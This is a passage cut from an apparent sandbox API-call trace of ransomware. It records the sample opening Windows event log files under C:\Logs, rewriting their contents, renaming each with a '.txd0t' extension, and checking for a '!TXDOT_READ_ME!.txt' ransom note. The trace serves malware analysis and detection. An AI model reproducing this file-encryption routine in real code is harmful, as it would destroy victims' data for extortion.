psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0088.517] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0088.517] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.517] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.517] GetProcessHeap () returned 0xe30000 [0088.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.517] CloseHandle (hObject=0x460) returned 1 [0088.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.txd0t")) returned 1 [0088.518] SetEvent (hEvent=0x40c) returned 1 [0088.519] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.519] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0088.519] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t" [0088.519] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned 0 [0088.519] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.520] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.520] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.520] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.520] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.521] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.521] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11000, lpOverlapped=0x0) returned 1 [0088.528] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.529] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11000, lpOverlapped=0x0) returned 1 [0088.529] FlushFileBuffers (hFile=0x460) returned 1 [0088.763] GetProcessHeap () returned 0xe30000 [0088.763] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed16a8 [0088.763] StrCpyW (in: psz1=0xed16a8, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0088.763] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0088.763] StrCpyW (in: psz1=0xed16c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.763] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.765] GetProcessHeap () returned 0xe30000 [0088.765] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed16a8 | out: hHeap=0xe30000) returned 1 [0088.765] CloseHandle (hObject=0x460) returned 1 [0088.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.txd0t")) returned 1 [0088.778] SetEvent (hEvent=0x40c) returned 1 [0088.778] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.783] StrCpyW (in: psz1=0x4a9f720, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0088.783] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t" [0088.784] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned 0 [0088.784] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.784] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.784] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.784] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.784] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.785] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.785] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6e0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6e0*=0x11000, lpOverlapped=0x0) returned 1 [0088.788] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.788] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6e4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6e4*=0x11000, lpOverlapped=0x0) returned 1 [0088.788] FlushFileBuffers (hFile=0x460) returned 1 [0088.920] GetProcessHeap () returned 0xe30000 [0088.920] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x136) returned 0xed7f88 [0088.920] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0088.920] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0088.920] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.920] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.920] GetProcessHeap () returned 0xe30000 [0088.920] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.920] CloseHandle (hObject=0x460) returned 1 [0088.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.txd0t")) returned 1 [0088.921] SetEvent (hEvent=0x40c) returned 1 [0088.921] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.922] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0088.922] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t" [0088.922] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned 0 [0088.922] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.922] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.922] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.923] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.923] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.924] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.924] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0088.926] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.926] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0088.927] FlushFileBuffers (hFile=0x460) returned 1 [0088.978] GetProcessHeap () returned 0xe30000 [0088.978] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x126) returned 0xed7f88 [0088.978] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0088.978] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0088.978] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.978] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.979] GetProcessHeap () returned 0xe30000 [0088.979] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.979] CloseHandle (hObject=0x460) returned 1 [0088.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.txd0t")) returned 1 [0088.979] SetEvent (hEvent=0x40c) returned 1 [0088.979] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.982] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0088.982] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t" [0088.982] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned 0 [0088.982] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.982] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.982] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.982] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.983] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.983] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.983] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0088.986] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.986] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0088.986] FlushFileBuffers (hFile=0x460) returned 1 [0089.113] GetProcessHeap () returned 0xe30000 [0089.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0089.113] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0089.113] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0089.113] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.113] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.115] GetProcessHeap () returned 0xe30000 [0089.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.116] CloseHandle (hObject=0x460) returned 1 [0089.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.txd0t")) returned 1 [0089.117] SetEvent (hEvent=0x40c) returned 1 [0089.118] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.118] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" [0089.118] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t" [0089.124] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned 0 [0089.125] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0089.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.128] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.128] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.128] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.137] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x11000, lpOverlapped=0x0) returned 1 [0089.139] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.139] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x11000, lpOverlapped=0x0) returned 1 [0089.139] FlushFileBuffers (hFile=0x460) returned 1 [0089.144] GetProcessHeap () returned 0xe30000 [0089.144] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0089.144] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" [0089.144] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="Microsoft-Windows-MUI%4Admin.evtx" [0089.144] StrCpyW (in: psz1=0xe9d768, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.144] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.144] GetProcessHeap () returned 0xe30000 [0089.144] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0089.144] CloseHandle (hObject=0x460) returned 1 [0089.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.txd0t")) returned 1 [0089.145] SetEvent (hEvent=0x40c) returned 1 [0089.145] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.148] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" [0089.148] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t" [0089.148] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned 0 [0089.148] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.155] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.155] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.156] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.156] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.157] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.157] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11000, lpOverlapped=0x0) returned 1 [0089.160] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.160] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11000, lpOverlapped=0x0) returned 1 [0089.160] FlushFileBuffers (hFile=0x474) returned 1 [0089.167] GetProcessHeap () returned 0xe30000 [0089.167] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2e18 [0089.168] StrCpyW (in: psz1=0xed2e18, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" [0089.168] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") 